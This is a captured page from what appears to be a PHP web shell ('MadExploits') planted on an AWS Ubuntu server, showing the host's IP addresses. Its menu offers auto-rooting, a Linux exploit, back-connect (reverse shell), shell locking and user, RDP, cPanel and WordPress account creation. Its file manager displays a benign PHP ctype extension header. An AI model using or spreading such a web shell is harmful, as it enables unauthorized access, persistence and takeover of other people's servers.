Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.142.55.180
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
80 /
src /
ext /
ctype /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
CREDITS
25
B
-rw-r--r--
config.m4
262
B
-rw-r--r--
config.w32
163
B
-rw-r--r--
ctype.c
3.81
KB
-rw-r--r--
ctype.stub.php
526
B
-rw-r--r--
ctype_arginfo.h
1.57
KB
-rw-r--r--
php_ctype.h
1.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ctype_arginfo.h
/* This is a generated file, edit the .stub.php file instead. * Stub hash: aa287af25fe33a05d15d85b92b0edcfae00284a2 */ ZEND_BEGIN_ARG_WITH_RETURN_TYPE_INFO_EX(arginfo_ctype_alnum, 0, 1, _IS_BOOL, 0) ZEND_ARG_TYPE_INFO(0, text, IS_MIXED, 0) ZEND_END_ARG_INFO() #define arginfo_ctype_alpha arginfo_ctype_alnum #define arginfo_ctype_cntrl arginfo_ctype_alnum #define arginfo_ctype_digit arginfo_ctype_alnum #define arginfo_ctype_lower arginfo_ctype_alnum #define arginfo_ctype_graph arginfo_ctype_alnum #define arginfo_ctype_print arginfo_ctype_alnum #define arginfo_ctype_punct arginfo_ctype_alnum #define arginfo_ctype_space arginfo_ctype_alnum #define arginfo_ctype_upper arginfo_ctype_alnum #define arginfo_ctype_xdigit arginfo_ctype_alnum ZEND_FUNCTION(ctype_alnum); ZEND_FUNCTION(ctype_alpha); ZEND_FUNCTION(ctype_cntrl); ZEND_FUNCTION(ctype_digit); ZEND_FUNCTION(ctype_lower); ZEND_FUNCTION(ctype_graph); ZEND_FUNCTION(ctype_print); ZEND_FUNCTION(ctype_punct); ZEND_FUNCTION(ctype_space); ZEND_FUNCTION(ctype_upper); ZEND_FUNCTION(ctype_xdigit); static const zend_function_entry ext_functions[] = { ZEND_FE(ctype_alnum, arginfo_ctype_alnum) ZEND_FE(ctype_alpha, arginfo_ctype_alpha) ZEND_FE(ctype_cntrl, arginfo_ctype_cntrl) ZEND_FE(ctype_digit, arginfo_ctype_digit) ZEND_FE(ctype_lower, arginfo_ctype_lower) ZEND_FE(ctype_graph, arginfo_ctype_graph) ZEND_FE(ctype_print, arginfo_ctype_print) ZEND_FE(ctype_punct, arginfo_ctype_punct) ZEND_FE(ctype_space, arginfo_ctype_space) ZEND_FE(ctype_upper, arginfo_ctype_upper) ZEND_FE(ctype_xdigit, arginfo_ctype_xdigit) ZEND_FE_END };
Close